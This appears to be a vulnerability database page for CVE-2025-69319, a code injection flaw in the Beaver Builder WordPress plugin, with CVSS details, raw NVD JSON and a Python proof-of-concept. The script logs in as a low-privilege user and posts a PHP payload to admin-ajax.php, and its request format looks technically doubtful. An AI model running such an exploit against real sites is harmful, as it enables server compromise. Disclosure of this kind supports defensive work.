Security Vulnerability Report
中文
CVE-2025-69319 CVSS 7.5 HIGH

CVE-2025-69319

Published: 2026-01-22 17:16:28
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in Beaver Builder Beaver Builder beaver-builder-lite-version allows Code Injection.This issue affects Beaver Builder: from n/a through <= 2.9.4.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Beaver Builder Lite Version <= 2.9.4.1
Beaver Builder Plugin (版本未明确)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69319 Beaver Builder Code Injection PoC # Target: WordPress site with Beaver Builder Lite <= 2.9.4.1 TARGET = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' USERNAME = sys.argv[2] if len(sys.argv) > 2 else 'subscriber' PASSWORD = sys.argv[3] if len(sys.argv) > 3 else 'password' def exploit_code_injection(): # Login to get valid session login_url = f"{TARGET}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) # Inject malicious payload via Beaver Builder endpoint inject_url = f"{TARGET}/wp-admin/admin-ajax.php" payload = { 'action': 'fl_builder_save_settings', 'node': 'invalid-node', 'settings': { 'custom_code': '<?php phpinfo(); ?>' # Malicious PHP code } } response = session.post(inject_url, data=payload) print(f"Response Status: {response.status_code}") print(f"Response: {response.text}") if __name__ == '__main__': print(f"[*] Exploiting CVE-2025-69319 on {TARGET}") exploit_code_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69319", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:27.713", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Generation of Code ('Code Injection') vulnerability in Beaver Builder Beaver Builder beaver-builder-lite-version allows Code Injection.This issue affects Beaver Builder: from n/a through <= 2.9.4.1."}, {"lang": "es", "value": "Vulnerabilidad de Control Inadecuado de la Generación de Código ('Inyección de Código') en Beaver Builder Beaver Builder beaver-builder-lite-version permite la Inyección de Código. Este problema afecta a Beaver Builder: desde n/a hasta &lt;= 2.9.4.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/beaver-builder-lite-version/vulnerability/wordpress-beaver-builder-plugin-2-9-4-1-arbitrary-code-execution-vulnerability?_s_id=cve", "source": "[email protected]"}]}}